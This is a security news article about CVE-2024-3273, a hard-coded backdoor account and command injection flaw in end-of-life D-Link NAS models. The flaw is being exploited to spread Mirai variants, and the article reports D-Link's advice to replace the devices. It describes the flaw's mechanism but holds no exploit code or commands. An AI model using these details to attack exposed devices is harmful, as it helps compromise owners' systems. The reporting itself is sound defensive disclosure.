A Critical Flaw in D-Link NAS Devices is Under Active Exploitation in Over 92,000 Devices leaving them Vulnerable to Remote Code Execution. No patch is available yet!
Security researchers have reported that a critical remote code execution (RCE) vulnerability present in tens of thousands of D-Link Network Attached Storage (NAS) devices is now being actively exploited in attacks.
Critical Flaw in D-Link NAS Allows Arbitrary Command Execution
Discovered by researcher Netsecfish, the Critical Flaw in D-Link NAS (CVE-2024-3273) stems from a hard-coded backdoor account with blank credentials and the ability to execute arbitrary commands via command injection in the “system” parameter.
Threat actors are chaining the backdoor access and RCE bug to deploy variants of the infamous Mirai botnet malware, likely with the goal of incorporating infected devices into large scale DDoS botnets.
“The described vulnerability affects multiple D-Link NAS devices, including models DNS-340L, DNS-320L, DNS-327L, and DNS-325, among others,”
“Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the system, potentially leading to unauthorized access to sensitive information, modification of system configurations, or denial of service conditions.”
Netsecfish explains.
Affected Devices and Models
The vulnerability impacts multiple D-Link NAS models, including but not limited to:
| Model | End of Service Life |
| DNS-320L | 05/31/2020 |
| DNS-325 | 09/01/2017 |
| DNS-327L | 05/31/2020 |
| DNS-340L | 07/31/2019 |
Over 92,000 devices with these models were found to still be exposed online and vulnerable to exploitation.
No Patch Available Yet!
While initially stating it would not patch the critical flaw due to the devices’ end-of-life status, D-Link later notified owners to immediately discontinue use and replace vulnerable systems. However, patches are still not available.
According to the spokesperson, the NAS devices affected by these ongoing attacks lack automatic online updating or alert delivery mechanisms. As a result, it has become impossible to notify the owners about the attacks.
Following the disclosure, D-Link took action and issued a security advisory on Thursday. The advisory aims to inform owners about the security vulnerability and strongly advises them to retire or replace the affected devices as soon as possible.
To assist owners of legacy devices, D-Link has created a support page. However, it is important to note that applying the latest security and firmware updates through the legacy support website may not offer complete protection against attackers.
With active attacks underway, the lack of an available patch from D-Link leaves thousands of devices at risk of compromise. Until patched, discontinuing exposed vulnerable systems remains the only mitigation.
